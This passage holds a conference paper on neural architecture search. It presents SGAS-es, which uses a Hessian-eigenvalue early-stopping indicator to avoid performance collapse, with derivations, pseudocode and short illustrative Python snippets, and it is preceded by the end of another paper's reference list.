46. Mahendran, A., Vedaldi, A.: Understanding deep image representations by inverting them. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 5188–5196 (2015)
47. Nguyen, A., Dosovitskiy, A., Yosinski, J., Brox, T., Clune, J.: Synthesizing the preferred inputs for neurons in neural networks via deep generator networks. In: Advances in Neural Information Processing Systems, pp. 3387–3395 (2016)
48. van den Oord, A., Kalchbrenner, N., Kavukcuoglu, K.: Pixel recurrent neural networks. arXiv preprint arXiv:1601.06759 (2016)
49. Simonyan, K., Vedaldi, A., Zisserman, A.: Deep inside convolutional networks: visualising image classification models and saliency maps. arXiv preprint arXiv:1312.6034 (2013)
50. Khan, J., et al.: Classification and diagnostic prediction of cancers using gene expression profiling and artificial neural networks. Nat. Med. 7(6), 673–679 (2001)
51. Baehrens, D., Schroeter, T., Harmeling, S., Kawanabe, M., Hansen, K., Müller, K.-R.: How to explain individual classification decisions. J. Mach. Learn. Res. 11, 1803–1831 (2010)
52. Smilkov, D., Thorat, N., Kim, B., Viégas, F., Wattenberg, M.: Smoothgrad: removing noise by adding noise. arXiv preprint arXiv:1706.03825 (2017)
53. Sundararajan, M., Taly, A., Yan, Q.: Axiomatic attribution for deep networks. arXiv preprint arXiv:1703.01365 (2017)
54. Lapuschkin, S., Binder, A., Montavon, G., Müller, K.-R., Samek, W.: Analyzing classifiers: fisher vectors and deep neural networks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 2912–2920 (2016)
55. Arbabzadah, F., Montavon, G., Müller, K.-R., Samek, W.: Identifying individual facial expressions by deconstructing a neural network. In: Rosenhahn, B., Andres, B. (eds.) GCPR 2016. LNCS, vol. 9796, pp. 344–354. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-45886-1_28
56. Sturm, I., Lapuschkin, S., Samek, W., Müller, K.-R.: Interpretable deep neural networks for single-trial EEG classification. J. Neurosci. Methods 274, 141–145 (2016)
57. Binder, A., Montavon, G., Lapuschkin, S., Müller, K.-R., Samek, W.: Layer-wise relevance propagation for neural networks with local renormalization layers. In: Villa, A.E.P., Masulli, P., Pons Rivero, A.J. (eds.) ICANN 2016. LNCS, vol. 9887, pp. 63–71. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-44781-0_8
58. Shimizu, K.: Multivariate Analysis. Nikkan Kogyo Shinbun (2009). (in Japanese)
SGAS-es: Avoiding Performance Collapse by Sequential Greedy Architecture Search with the Early Stopping Indicator
Shih-Ping Lin and Sheng-De Wang
National Taiwan University, Taipei 106319, Taiwan
{r09921057,sdwang}@ntu.edu.tw
Abstract. Sequential Greedy Architecture Search (SGAS) reduces the discretization loss of Differentiable Architecture Search (DARTS). However, we observed that SGAS, like DARTS, may lead to unstable search results. We refer to this problem as the cascade performance collapse issue. Therefore, we propose Sequential Greedy Architecture Search with the Early Stopping Indicator (SGAS-es). We adopt the early stopping mechanism in each phase of SGAS to stabilize search results and further improve the searching ability. The early stopping mechanism is based on the relation among Flat Minima, the largest eigenvalue of the Hessian matrix of the loss function, and performance collapse. We devise a mathematical derivation to show the relation between Flat Minima and the largest eigenvalue. The moving-averaged largest eigenvalue is used as an early stopping indicator. Finally, we use NAS-Bench-201 and Fashion-MNIST to confirm the performance and stability of SGAS-es. Moreover, we use EMNIST-Balanced to verify the transferability of the search results. These experiments show that SGAS-es is a robust method and can derive architectures with good performance and transferability.
Keywords: Neural architecture search · Differentiable architecture search · Sequential greedy architecture search · Flat minima · Early stopping · Image classification · Deep learning
1 Introduction
Differentiable Architecture Search (DARTS) [1] vastly reduced the resource requirement of Neural Architecture Search (NAS): it uses less than 5 GPU days and achieves competitive performance on CIFAR-10, PTB, and ImageNet with only a single 1080Ti.
1.1 Problems of DARTS and SGAS
However, numerous studies have pointed out that DARTS does not work well. Yang et al. [2] compared several DARTS-based approaches with a Random Sampling baseline and found that Random Sampling often finds better architectures.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 135–154, 2023. https://doi.org/10.1007/978-3-031-28073-3_10
Zela et al. [3] delved into this issue and showed that DARTS often produces an architecture full of skip connections. This leads to performance collapse and makes the results of DARTS unstable. Xie et al. [4] attributed these issues to the optimization gap between the encode/decode scheme of DARTS and the original NAS. To solve these problems, P-DARTS [5] and DARTS+ [6] constrained the number of skip connections manually, but this may suffer from human bias. SmoothDARTS [7] added some perturbation to stabilize DARTS, which may mislead the optimization direction. PC-DARTS [8] used a sampling technique called partial channel connections to forward only part of the channels through the operation mixture. This can regularize the effect of skip connections at the early stage. However, if we increase the total number of training epochs from 50 to 200, 400, or even more, the search will still end up with an architecture full of skip connections. Liang et al. [6] called this “the implicit early-stopping scheme”.

Performance Collapse Issue. Fig. 1 shows a cell derived by DARTS on NAS-Bench-201 [9] with the CIFAR-10 dataset. It is full of skip connections. The skip connection is an identity mapping without any parameters. Therefore, the searched cell performs poorly, with only about 60% accuracy on the test set, whereas the best cell can reach 94.37% accuracy. This phenomenon is called performance collapse. One possible explanation of performance collapse is overfitting [3,6]. Since DARTS encodes cells into over-parameterized supergraphs (Fig. 3), operations between every two nodes have different numbers of parameters. That is, operations with parameters, such as convolution, are trained together with operations with no parameters, such as the skip connection and the Zero Operation. In the early epochs, this is fine because every operation is underfitting and all operations improve together. However, as the number of training epochs grows, operations with parameters start to overfit.
Therefore, the α values of parameter-free operations keep growing. This trend is irreversible, and eventually every edge selects the skip connection. However, this issue cannot be observed from the validation error of the supernet, so another quantity is required as the early stopping indicator.
Fig. 1. Example of performance collapse
Cascade Performance Collapse Issue. SGAS [10] is a DARTS-based method. The main purpose of SGAS is to reduce the discretization loss of DARTS. It splits the whole searching process of DARTS into multiple phases. However, we observed that SGAS still suffers from the instability issue. Figure 2 shows an example. We ran SGAS on NAS-Bench-201 with the CIFAR-10 dataset, and it ended up selecting the skip connection on four edges. That is, performance collapse occurred in nearly every phase of SGAS. The resulting architecture has a test accuracy of 88.51%. Although this is already better than DARTS, there is still room for improvement. We call this phenomenon cascade performance collapse.
Fig. 2. Example of cascade performance collapse
1.2 Research Purposes and Main Contributions
Our research aims to resolve the instability issue of SGAS. The proposed method, SGAS-es, applies the early stopping indicator proposed by Zela et al. [3] to each phase of SGAS. Doing so stabilizes the performance of the derived architectures and also improves the search ability of SGAS. Our main contributions are as follows:
– Mathematical Derivation: using the sharpness definition proposed by Keskar et al. [11], we show the relation between flat minima of a loss landscape and the largest eigenvalue of the Hessian matrix of the loss function.
– Novel Algorithm: we point out that SGAS suffers from the cascade performance collapse issue and propose SGAS-es, Sequential Greedy Architecture Search with the Early Stopping Indicator, to stabilize architecture search results and derive architectures with better learning ability.
– Thorough Experiments: we use NAS-Bench-201 [9], a unified NAS benchmark with three datasets (CIFAR-10, CIFAR-100, and ImageNet-16-120), to compare SGAS-es with other DARTS-based approaches, and we achieve state-of-the-art results on all of them with robust performance. We then use the DARTS CNN Search Space with the Fashion-MNIST dataset and show that SGAS-es also works on a more complex search space. Finally, by retraining the cells searched on Fashion-MNIST on the EMNIST-Balanced dataset, we again achieve state-of-the-art performance and show that architectures searched by SGAS-es have excellent transferability.
These experiments confirm that SGAS-es is a generalized approach that can avoid stepping into performance collapse and derive suitable architectures.
Fig. 3. Encoded Cell Structure. Each Node x(i) is a Latent Representation. Each Edge o(i,j) is an Operation Chosen from Candidate Operations
2 Prior Knowledge
2.1 Neural Architecture Search (NAS)
Generally, NAS can be decomposed into three parts [12]: Search Space, Search Strategy, and Performance Estimation Strategy. The Search Space is a collection of possible architectures defined by human experts. Since the Search Space often contains a very large number of elements, a Search Strategy is required to pick a potentially well-performing architecture from it. After an architecture is picked, the Performance Estimation Strategy tells the Search Strategy how the architecture performs. The Search Strategy can then start the next search round.
2.2 Differentiable Architecture Search (DARTS)
The DARTS [1] search space is a cell-based search space. Cells are stacked in a fixed pattern to form the supernet architecture. DARTS only determines the architecture inside the cells; the supernet architecture is predefined. There are two important steps in DARTS: Continuous Relaxation and Discretization. Continuous Relaxation encodes the discrete search space via architecture parameters α. DARTS connects all candidate operations between every two nodes and forms a supergraph as in Fig. 3, so the transformation between nodes $x^{(i)}$ and $x^{(j)}$ becomes a mixed operation $\bar{o}^{(i,j)}(x)$:
$$\bar{o}^{(i,j)}(x) = \sum_{o \in O} \frac{\exp(\alpha_o^{(i,j)})}{\sum_{o' \in O} \exp(\alpha_{o'}^{(i,j)})} \, o(x) \tag{1}$$
Here O is the set of candidate operations, and $\alpha_o^{(i,j)}$ is the architecture parameter on edge (i, j) corresponding to the operation o. In other words, $\bar{o}^{(i,j)}(x)$ is a sum of the outputs o(x) weighted by the Softmax of $\alpha_o^{(i,j)}$ on edge (i, j).
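As an illustration of (1), the following minimal Python sketch computes a mixed operation on a single edge. It is not the authors' implementation: the scalar input and the three lambda functions are hypothetical stand-ins for feature maps and candidate operations, and only the Softmax weighting follows (1).

```python
import math

def softmax(alphas):
    """Numerically stable softmax over a list of architecture parameters."""
    m = max(alphas)
    exps = [math.exp(a - m) for a in alphas]
    total = sum(exps)
    return [e / total for e in exps]

def mixed_operation(x, alphas, operations):
    """Eq. (1): softmax-weighted sum of all candidate operations applied to x."""
    weights = softmax(alphas)
    return sum(w * op(x) for w, op in zip(weights, operations))

# Hypothetical scalar stand-ins for the candidate operations on one edge.
candidate_ops = [
    lambda x: 0.0,       # Zero Operation
    lambda x: x,         # skip connection (identity mapping)
    lambda x: 2.0 * x,   # stand-in for an operation with parameters
]

alphas = [0.0, 0.0, 0.0]  # equal architecture parameters give uniform weights
y = mixed_operation(3.0, alphas, candidate_ops)
```

With equal architecture parameters, each candidate receives the same weight, so the output is the plain average of the three candidate outputs.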
Discretization decodes the supergraph to obtain the final searched cells. Each node in the final searched cells must have an in-degree of 2, so Discretization can also be viewed as a pruning step. The basic pruning rule is that a larger $\alpha_o^{(i,j)}$ indicates that the operation o is more important on edge (i, j). Therefore, o has a higher priority to be picked:
$$o^{(i,j)} = \mathrm{Disc}(\alpha_o^{(i,j)}) = \arg\max_{o \in O} \alpha_o^{(i,j)} \tag{2}$$
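The pruning rule in (2) amounts to an arg max per edge. The sketch below assumes a hypothetical dictionary that maps each edge to its list of architecture parameters, together with a made-up list of operation names; the restriction of each node to an in-degree of 2 is not modeled.

```python
def discretize(alpha_per_edge, op_names):
    """Eq. (2): for every edge, keep the operation with the largest alpha."""
    chosen = {}
    for edge, alphas in alpha_per_edge.items():
        best = max(range(len(alphas)), key=lambda idx: alphas[idx])
        chosen[edge] = op_names[best]
    return chosen

# Hypothetical operation names and architecture parameters for two edges.
op_names = ["zero", "skip_connect", "sep_conv_3x3"]
alpha_per_edge = {
    (0, 1): [0.1, 0.3, 1.2],
    (0, 2): [0.2, 0.9, 0.4],
}
cell = discretize(alpha_per_edge, op_names)
```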
The goal of DARTS is given by (3), which is a bi-level optimization problem. In the upper-level task, given $w^{\star}(\alpha)$, we want to find the best architecture parameter $\alpha^{\star}$, which minimizes the loss computed on $D_{valid}$. In the lower-level task, given α, we want to find the best network parameter $w^{\star}(\alpha)$, which minimizes the loss computed on $D_{train}$.
$$\alpha^{\star} = \arg\min_{\alpha} L(D_{valid}, w^{\star}(\alpha), \alpha) \quad \text{s.t.} \quad w^{\star}(\alpha) = \arg\min_{w} L(D_{train}, w, \alpha) \tag{3}$$
The whole process of DARTS-based architecture search methods can be divided into two stages: the searching stage and the retraining stage. The goal of the searching stage is to derive the best normal and reduction cells. In the retraining stage, we stack the cells derived in the searching stage to form another supernet and train it from scratch.
2.3 Sequential Greedy Architecture Search (SGAS)
SGAS [10] is a DARTS-based method that reduces the discretization loss. The significant difference between SGAS and DARTS lies in the Search Strategy. Rather than performing discretization at the end of the searching stage, SGAS picks an edge and fixes the operation of that edge every fixed number of epochs. SGAS reduces the discrepancy between the ranking of validation errors in the searching stage and the ranking of test errors in the retraining stage. Therefore, the Kendall rank correlation coefficient between them is closer to 1 than that of DARTS. In this paper, a phase in SGAS means the search epochs between two decision epochs. For example, if eight edges need to be selected in a cell, then there will be nine phases in the searching stage of SGAS.
2.4 The Relation Among Flat Minima, $\lambda_{\max}^{\alpha}$, and Performance Collapse
Figure 4 shows the relations among these three concepts. This section explains the first and second relations, following [3]. In the Approach section, we give the mathematical derivation of the third relation.
Fig. 4. The relation among flat minima, $\lambda_{\max}^{\alpha}$ and performance collapse
The Relation Between $\lambda_{\max}^{\alpha}$ and Performance Collapse. Zela et al. [3] studied the correlation between $\lambda_{\max}^{\alpha}$ and the test error of derived architectures. $\lambda_{\max}^{\alpha}$ is the largest eigenvalue of $\nabla^2 L(D_{valid}, w^{\star}(\alpha), \alpha^{\star})$. It is calculated on the supernet in the searching stage with a randomly sampled mini-batch of $D_{valid}$. The test error is calculated after discretization, once retraining is finished. Zela et al. [3] used four search spaces (S1-S4) with three datasets (12 benchmarks) to provide detailed experimental results. They used 24 different architectures and drew a scatter plot on each benchmark to show a strong correlation between $\lambda_{\max}^{\alpha}$ and the test error.
The Relation Between Performance Collapse and Flat Minima. Figure 5 shows that the performance drop after discretization is larger at a sharp minimum than at a flat minimum, which leads to performance collapse. This also explains why the Kendall rank correlation coefficient is far from 1 in DARTS. To verify this explanation, Zela et al. [3] also plotted the correlation between $\lambda_{\max}^{\alpha}$ and the validation error drop after discretization, $L(D_{valid}, w^{\star}(\alpha_{Disc}), \alpha_{Disc}) - L(D_{valid}, w^{\star}(\alpha^{\star}), \alpha^{\star})$, and showed that the two are indeed strongly correlated.
Fig. 5. The role of flat and sharp minima of α in DARTS
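The Kendall rank correlation coefficient mentioned in Sects. 2.3 and 2.4 measures how well two rankings agree. A minimal sketch of the tie-free variant (tau-a) is given below; the error values are made up for illustration and are not results from this paper.

```python
from itertools import combinations

def kendall_tau(xs, ys):
    """Kendall rank correlation (tau-a) for two equally long sequences without ties."""
    if len(xs) != len(ys) or len(xs) < 2:
        raise ValueError("need two sequences of equal length >= 2")
    concordant = discordant = 0
    for i, j in combinations(range(len(xs)), 2):
        sign = (xs[i] - xs[j]) * (ys[i] - ys[j])
        if sign > 0:
            concordant += 1      # the pair is ordered the same way in both lists
        elif sign < 0:
            discordant += 1      # the pair is ordered in opposite ways
    n_pairs = len(xs) * (len(xs) - 1) // 2
    return (concordant - discordant) / n_pairs

# Made-up error rates (%) of four hypothetical architectures.
search_valid_error = [12.0, 10.5, 11.2, 9.8]
retrain_test_error = [7.1, 6.0, 6.6, 5.9]    # same ordering as the search stage
reversed_test_error = [5.9, 6.6, 6.0, 7.1]   # exactly the opposite ordering

tau_consistent = kendall_tau(search_valid_error, retrain_test_error)
tau_reversed = kendall_tau(search_valid_error, reversed_test_error)
```

A coefficient of 1 means that the searching stage ranks the architectures exactly as the retraining stage does, while −1 means that the ranking is fully reversed.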
3 Approach
3.1 SGAS-es Overview
The main purpose of SGAS is to reduce the discretization loss between the searching and retraining stages. Here we offer another view of SGAS: it performs early stopping several times. SGAS makes an edge decision at a fixed, user-defined decision frequency (the number of epochs between two edge decisions) and fixes the operation of the chosen edge, which is a kind of early stopping. Each time an operation is fixed, the loss landscape changes, so the remaining search can be viewed as another independent subproblem that requires several epochs to reach another local minimum. If the decision frequency is too large, each independent subproblem may lead to performance collapse, which we call the cascade performance collapse problem. If the decision frequency is too small, each edge decision is made when the search process is not yet stable enough, so the performance of architectures searched with different random seeds is not robust. Besides, performance collapse may happen at different epochs depending on the dataset, the search space, the phase of SGAS, or even the random seed.
To solve these problems, we propose SGAS-es, Sequential Greedy Architecture Search with the Early Stopping Indicator. Its primary purpose is to maximize the number of search epochs in each phase of SGAS without stepping into performance collapse. Since each phase searches for as many epochs as possible, we expect SGAS-es to be better at finding well-performing architectures and to derive more stable results across independent runs. In addition, we tend to perform discretization in relatively flat regions, which further reduces the discretization loss and makes the results more robust. There are four major functions in SGAS-es, introduced in the following four subsections.
3.2 Bilevel Optimization
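To solve (3) by gradient descent, one has to calculate the total derivative of $L(D_{valid}, w^{\star}(\alpha), \alpha)$. Liu et al. [1] used the chain rule, a one-step update [14], and a finite difference approximation to obtain (4), where ε is a small scalar.
$$\frac{dL(D_{valid}, w^{\star}(\alpha), \alpha)}{d\alpha} = \nabla_{\alpha} L(D_{valid}, w^{\star}(\alpha), \alpha) - \xi \, \frac{\nabla_{\alpha} L(D_{train}, w^{+}, \alpha) - \nabla_{\alpha} L(D_{train}, w^{-}, \alpha)}{2\epsilon} \tag{4}$$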
ξ is a user-defined learning rate. The case ξ > 0 is called the “Second-order Approximation”, and the case ξ = 0 is called the “First-order Approximation”. Although Liu et al. [1] showed empirically that searching with the First-order Approximation gives worse results than searching with the Second-order Approximation, the First-order Approximation is about twice as fast. Besides, many follow-up DARTS-based approaches, such as P-DARTS [5], PC-DARTS [8], SGAS [10], and Fair DARTS [13], used the First-order Approximation and reached state-of-the-art results with less searching time. As a result, we decided to use the First-order Approximation.
Algorithm 1 performs the search and validation steps of one epoch. We first update the architecture parameters α on the validation data $D_{valid}$ and the network weights w on the train data $D_{train}$, using mini-batch gradient descent. We then calculate the validation performance of the architecture for this epoch.
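The alternating update described above can be sketched on a toy problem. The example below is only an assumption-laden illustration of the First-order Approximation (ξ = 0): the scalar model pred = α · w · x, its analytic gradients, the data, and the learning rates are all hypothetical, and the mean validation loss stands in for the validation performance.

```python
def loss_and_grads(batch, w, alpha):
    """Squared error of the toy model pred = alpha * w * x, with analytic gradients."""
    x, y = batch
    err = alpha * w * x - y
    loss = err ** 2
    grad_alpha = 2.0 * err * w * x
    grad_w = 2.0 * err * alpha * x
    return loss, grad_alpha, grad_w

def search_valid_func(d_train, d_valid, w, alpha, lr_alpha, lr_w):
    """One search epoch with the first-order approximation (xi = 0)."""
    for batch_train, batch_valid in zip(d_train, d_valid):
        # Architecture step: gradient of the validation loss w.r.t. alpha only.
        _, grad_alpha, _ = loss_and_grads(batch_valid, w, alpha)
        alpha -= lr_alpha * grad_alpha
        # Weight step: gradient of the training loss w.r.t. w only.
        _, _, grad_w = loss_and_grads(batch_train, w, alpha)
        w -= lr_w * grad_w
    # Validation performance of this epoch (here: the mean validation loss).
    valid_loss = sum(loss_and_grads(b, w, alpha)[0] for b in d_valid) / len(d_valid)
    return valid_loss, w, alpha

d_train = [(1.0, 2.0), (0.5, 1.0)]   # toy (x, y) batches generated by y = 2x
d_valid = [(1.0, 2.0), (0.5, 1.0)]
w, alpha = 1.0, 1.0
history = []
for epoch in range(30):
    valid_loss, w, alpha = search_valid_func(d_train, d_valid, w, alpha, 0.05, 0.05)
    history.append(valid_loss)
```

In this toy setting the product α · w approaches 2 and the validation loss shrinks from epoch to epoch; a real supernet would replace the analytic gradients with back propagation.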
Algorithm 1: Search_valid_func
Input : D_train: the train data, D_valid: the validation data, arch: the architecture parameterized by α and w which we want to search, η_α, η_w: learning rates of α and w
Output: valid_performance: the validation performance of arch this epoch, arch
for (batch_train, batch_valid) in (D_train, D_valid) do
  α ← α − η_α ∇_α L(batch_valid, w, α);
  w ← w − η_w ∇_w L(batch_train, w, α);
end
Initialize valid_performance;
for batch_valid in D_valid do
  Update valid_performance by batch_valid;
end
return valid_performance, arch
3.3 Early Stopping Indicator
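In this section, we first prove the third relation in Fig. 4. We adopt the sharpness definition proposed by Keskar et al. [11]. Given architecture parameters $\alpha^{\star} \in \mathbb{R}^n$, a loss function L, and a small constant ε, the sharpness of $\alpha^{\star}$ on a loss landscape is defined as follows:
$$\phi(\alpha^{\star}, L, \epsilon) = \Big(\max_{z \in C_{\epsilon}} L(\alpha^{\star} + z)\Big) - L(\alpha^{\star}) \tag{5}$$
Equation (6) defines $C_{\epsilon}$, a box that collects the vectors z. Each element $z_i$ of z is a delta value along the i-th dimension.
$$C_{\epsilon} = \{z \in \mathbb{R}^n : -\epsilon \le z_i \le \epsilon \;\; \forall i \in \{1, 2, 3, \ldots, n\}\} \tag{6}$$
Let $\alpha^{\ast} = \alpha^{\star} + z$ be the perturbed point. $L(\alpha^{\ast})$ can be approximated by a Taylor series, where $g = \nabla L(\alpha^{\star})$ and $H = \nabla^2 L(\alpha^{\star})$:
$$L(\alpha^{\ast}) \approx L(\alpha^{\star}) + (\alpha^{\ast} - \alpha^{\star})^T g + \tfrac{1}{2} (\alpha^{\ast} - \alpha^{\star})^T H (\alpha^{\ast} - \alpha^{\star}) = L(\alpha^{\star}) + z^T g + \tfrac{1}{2} z^T H z \tag{7}$$
Assume that $\alpha^{\star}$ is a critical point, so that g = 0:
$$L(\alpha^{\ast}) \approx L(\alpha^{\star}) + \tfrac{1}{2} z^T H z \tag{8}$$
Substituting (8) into (5), the sharpness of $\alpha^{\star}$ becomes:
$$\phi(\alpha^{\star}, L, \epsilon) \approx \tfrac{1}{2} \Big(\max_{z \in C_{\epsilon}} z^T H z\Big) \tag{9}$$
Since H is an n × n symmetric matrix, H has n eigenvectors $\{v_1, v_2, \ldots, v_n\}$ forming an orthonormal basis of $\mathbb{R}^n$ such that:
$$z = \sum_{i=1}^{n} a_i v_i \quad \text{where} \quad \|z\|^2 = \sum_{i=1}^{n} a_i^2 \tag{10}$$
Because $H v_i = \lambda_i v_i$ and the $v_i$ are orthonormal, $z^T H z = \sum_{i=1}^{n} a_i^2 \lambda_i$. Substituting (10) into (9) therefore gives:
$$\phi(\alpha^{\star}, L, \epsilon) \approx \tfrac{1}{2} \max\Big(\sum_{i=1}^{n} a_i^2 \lambda_i\Big) \tag{11}$$
$\lambda_i$ are the eigenvalues corresponding to $v_i$. Let $\lambda_1 \ge \lambda_2 \ge \lambda_3 \ge \ldots \ge \lambda_n$:
$$\sum_{i=1}^{n} a_i^2 \lambda_i \le \lambda_1 \|z\|^2 \tag{12}$$
Assume that ε is small enough such that all $\|z\|$ are nearly the same:
$$\max\Big(\sum_{i=1}^{n} a_i^2 \lambda_i\Big) = \lambda_1 \|z\|^2 \tag{13}$$
Finally, the sharpness of $\alpha^{\star}$ is:
$$\phi(\alpha^{\star}, L, \epsilon) \approx \tfrac{1}{2} \lambda_1 \|z\|^2 \tag{14}$$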
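Relations (12) to (14) can be checked numerically on a toy example. The sketch below is an illustration under stated assumptions, not the procedure used in the experiments: the 2 × 2 matrix H is a made-up symmetric Hessian, the largest eigenvalue is estimated by power iteration (which presumes that the dominant eigenvalue is also the largest one), and the perturbations z are sampled on a circle of fixed radius r to mimic the assumption that all ‖z‖ are nearly the same.

```python
import math

def mat_vec(h, v):
    """Multiply a matrix (given as a list of rows) by a vector."""
    return [sum(h_ij * v_j for h_ij, v_j in zip(row, v)) for row in h]

def dot(u, v):
    return sum(a * b for a, b in zip(u, v))

def largest_eigenvalue(h, iters=200):
    """Power iteration; assumes the dominant eigenvalue of h is its largest one."""
    v = [1.0] + [0.0] * (len(h) - 1)
    for _ in range(iters):
        hv = mat_vec(h, v)
        norm = math.sqrt(dot(hv, hv))
        v = [c / norm for c in hv]
    return dot(v, mat_vec(h, v))   # Rayleigh quotient of the unit vector v

H = [[2.0, 1.0], [1.0, 2.0]]       # toy symmetric Hessian with eigenvalues 3 and 1
lambda_1 = largest_eigenvalue(H)

r = 0.01                            # common norm of all perturbations z
quadratic_forms = []
for degree in range(360):
    theta = math.radians(degree)
    z = [r * math.cos(theta), r * math.sin(theta)]
    quadratic_forms.append(dot(z, mat_vec(H, z)))   # z^T H z

max_quadratic_form = max(quadratic_forms)   # left-hand side of (13)
sharpness = 0.5 * lambda_1 * r ** 2         # right-hand side of (14)
```

Every sampled value of $z^T H z$ stays below $\lambda_1 \|z\|^2$, and the maximum is attained when z points along the leading eigenvector, which is the content of (12) and (13).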
Equation (14) shows that the sharpness is governed by the largest eigenvalue of $\nabla^2 L(\alpha^{\star})$. We denote the largest eigenvalue of $\nabla^2 L(\alpha^{\star})$ calculated on $D_{valid}$ by $\lambda_{\max}^{\alpha}$. We have now shown all relations in Fig. 4: a larger $\lambda_{\max}^{\alpha}$ leads to a larger test error in DARTS and indicates a sharper minimum, so $\lambda_{\max}^{\alpha}$ can be viewed as a better indicator of performance collapse than the supernet validation error. We adopt the early stopping indicator proposed by Zela et al. [3]. The goal is to prevent $\lambda_{\max}^{\alpha}$ from exploding:
$$\frac{\bar{\lambda}_{\max}^{\alpha}(i-k)}{\bar{\lambda}_{\max}^{\alpha}(i)} < Threshold \tag{15}$$
$\bar{\lambda}_{\max}^{\alpha}(i)$ is the average of $\lambda_{\max}^{\alpha}$ from epoch i − w + 1 to the current epoch i, where w is the window size and k is a constant. To prevent the explosion of $\lambda_{\max}^{\alpha}$, if $\bar{\lambda}_{\max}^{\alpha}(i-k)$ divided by $\bar{\lambda}_{\max}^{\alpha}(i)$ is smaller than T, we stop the searching of this phase, return the search to epoch i − k, and make the edge decision.
Algorithm 2 is the early stopping indicator. We use a FIFO buffer window_ev of size w to store the $\lambda_{\max}^{\alpha}$ of this epoch and the previous epochs. window_ev_avg is a dictionary playing the same role as $\bar{\lambda}_{\max}^{\alpha}(\cdot)$ in (15). After storing the mean of the values in window_ev into window_ev_avg[epoch], we check whether the early stopping condition is met. If so, stop is set to True.
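The buffer logic of the indicator can be sketched in a few lines of Python. This is a hedged illustration rather than the authors' code: the class name, the method name, and the eigenvalue trace are hypothetical, the eigenvalues are passed in instead of being computed from a supernet, and the check that the stored average for stop_epoch exists is an added safeguard. The demo uses a threshold of 0.75, an illustrative value below 1, because the ratio in (15) falls below 1 when $\lambda_{\max}^{\alpha}$ grows; how the reported T = 1.3 is applied to this ratio is not spelled out in the text, so this choice is an assumption.

```python
from collections import deque

class EarlyStoppingIndicator:
    """Windowed-average check of Eq. (15) on a stream of eigenvalues."""

    def __init__(self, w, k, threshold):
        self.k = k
        self.threshold = threshold
        self.window_ev = deque(maxlen=w)   # FIFO buffer; oldest value drops out
        self.window_ev_avg = {}            # epoch -> mean of the buffer

    def update(self, epoch, lambda_max, prev_stop_epoch):
        self.window_ev.append(lambda_max)
        self.window_ev_avg[epoch] = sum(self.window_ev) / len(self.window_ev)
        stop_epoch = epoch - self.k
        stop = False
        # The membership test is an added safeguard for the first k epochs.
        if stop_epoch >= prev_stop_epoch and stop_epoch in self.window_ev_avg:
            ratio = self.window_ev_avg[stop_epoch] / self.window_ev_avg[epoch]
            stop = ratio < self.threshold
        return stop, stop_epoch

# Hypothetical eigenvalue trace: flat for eight epochs, then growing quickly.
trace = [1.0] * 8 + [1.2, 1.5, 2.0, 2.6, 3.4]
indicator = EarlyStoppingIndicator(w=3, k=5, threshold=0.75)
first_stop = None
for epoch, lam in enumerate(trace, start=1):
    stop, stop_epoch = indicator.update(epoch, lam, prev_stop_epoch=1)
    if stop and first_stop is None:
        first_stop = (epoch, stop_epoch)
```

On this trace the condition first holds at epoch 11, and the search would be rolled back to epoch 6, before the eigenvalue started to grow.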
Algorithm 2: Indicator
Input : epoch: the current epoch, prev_stop_epoch: the epoch when the previous early stopping occurred, w, k, T, D_train, D_valid, arch
Output: stop: whether to do the early stopping or not, stop_epoch: the epoch to return to
Calculate λ_max^α using D_train, D_valid, arch;
Push λ_max^α into the back of window_ev;
if the length of window_ev > w then
  Pop a value from the front of window_ev;
end
stop ← False;
stop_epoch ← epoch − k;
window_ev_avg[epoch] ← Mean(window_ev);
if stop_epoch >= prev_stop_epoch and window_ev_avg[stop_epoch] / window_ev_avg[epoch] < T then
  stop ← True;
end
return stop, stop_epoch
3.4 Edge Decision Strategy
When the search meets the early stopping condition, the edge decision strategy is used to pick an edge and fix the operation of that edge. This kind of greedy decision reduces the discretization loss compared to DARTS. Besides, we try to perform the discretization at a flat minimum each time, so we expect a lower discretization loss than the original SGAS. We follow the edge decision strategy proposed by Li et al. [10]. There are two major criteria: Non-Zero Operations Proportion and Edge Entropy.
Non-Zero Operations Proportion. The Zero Operation (also called None Operation) indicates that the edge has no operation. We assume that an edge with a smaller proportion of the Zero Operation, i.e. a smaller value of $\exp(\alpha_{zero}^{(i,j)}) / \sum_{o \in O} \exp(\alpha_o^{(i,j)})$, where $\alpha_{zero}^{(i,j)}$ is the architecture parameter of the Zero Operation on edge (i, j), is more important. Therefore, we use the proportion of Non-Zero Operations to evaluate the importance of the edge. The larger $EI^{(i,j)}$ is, the more likely the edge (i, j) is to be selected.
$$EI^{(i,j)} = 1 - \frac{\exp(\alpha_{zero}^{(i,j)})}{\sum_{o' \in O} \exp(\alpha_{o'}^{(i,j)})} \tag{16}$$
Edge Entropy. The probability mass function of $\alpha_o^{(i,j)}$ is defined as follows:
$$P(\alpha_o^{(i,j)}) = \frac{\exp(\alpha_o^{(i,j)})}{EI^{(i,j)} \sum_{o' \in O} \exp(\alpha_{o'}^{(i,j)})}, \quad \text{where } o \in O, \; o \neq zero \tag{17}$$
Algorithm 3: Edge_decision
Input : arch
Output: edge_index: the index of the selected edge
Calculate EI of each edge (i, j) by (16);
Calculate P(α_o^(i,j)) of every α_o^(i,j) by (17);
Calculate SC of each edge (i, j) by (18);
Calculate Score of each edge (i, j) by (19);
edge_index ← arg max_(i,j) Score^(i,j);
return edge_index
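Algorithm 3 can be sketched in Python as follows. The sketch follows (16) to (19) but rests on assumptions: normalize(·) is taken to be min-max scaling over the edges of the cell (the text does not specify it), a constant 1.0 is returned when all values are equal, the Zero Operation is assumed to sit at index 0, and the architecture parameters are invented for illustration.

```python
import math

def softmax(alphas):
    m = max(alphas)
    exps = [math.exp(a - m) for a in alphas]
    total = sum(exps)
    return [e / total for e in exps]

def edge_importance(alphas, zero_index=0):
    """Eq. (16): one minus the softmax weight of the Zero Operation."""
    return 1.0 - softmax(alphas)[zero_index]

def selection_certainty(alphas, zero_index=0):
    """Eq. (18): one minus the normalized entropy over the non-zero operations."""
    probs = softmax(alphas)
    ei = 1.0 - probs[zero_index]
    # Eq. (17): renormalize the non-zero operations so that they sum to one.
    p = [q / ei for i, q in enumerate(probs) if i != zero_index]
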